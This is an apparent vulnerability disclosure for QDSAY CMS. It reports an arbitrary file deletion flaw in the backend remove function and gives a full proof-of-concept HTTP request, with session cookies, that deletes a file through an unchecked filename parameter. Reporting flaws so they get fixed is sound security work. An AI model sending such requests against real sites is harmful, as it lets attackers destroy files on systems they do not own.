QDSAY cms has an arbitrary file deletion vulnerability in the remove function in application\backend\core\QD_Controller.php

[liao10086]

The function remove not limit the delete filename,so I can delete any file.
POC：

GET /backend/article/remove?filename=%2Flicense.txt HTTP/1.1
Host: localhost
Accept: /
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
DNT: 1
Referer: http://localhost/backend/article/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1531379042; greencms_last_visit_page=aHR0cDovL2xvY2FsaG9zdC9pbmRleC5waHA%2FbT1hZG1pbiZjPXBvc3RzJmE9cG9zdHMmaWQ9MQ%3D%3D; greencms_post_add1=x%9C%85%8FK%0B%C20%10%84%FF%8A%EC%C1S%C5%24%B4M%8D%E2%C5%83%27O%1E%8DH%1Fi%0D%D44%98%CDA%C4%FFnJ%7D%80%82%9E%96%99%FDf%97%B9%82%ED%1C%1EPc%AB%40%80%F4i%C1%98%F4Y%5D%2A%E9%E3%9A%D7%D2%F3%84e%EB%B3Rf%B5%D9B4%F0egP%19%0C%89%85%5D%8EM%E1%EC%7C%F4%7F%F4%17S%22%7D2%E3U%14%84%A2i%7F%3E.%7F%85%16rj%97%E1o%99%A3%03%B1%03%0A%FB%080o%DEbhp%B1%7D%01%A7M%13%9A%3CL%879%FA%00%82%F5E%AB%DD%F1%E9%A3%3A%D96%C7%EF%00v6x%E4%29%AB%81a%84f%13%C2%27%94%8Dh%22%E8L%D0%17q%EA%2A%5DkU%7DP%A9+%5C%C4%2FJ%F7%7B%0A%B7%3B%29%BCqm; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1532595699; tm=20e0109ed56458f613d642c25308ebcc; ci_session=f381a36b9806873709c66b7841b4bae32054f2cc
Connection: close

I hope you can fix this vulnerability。
author by: [email protected]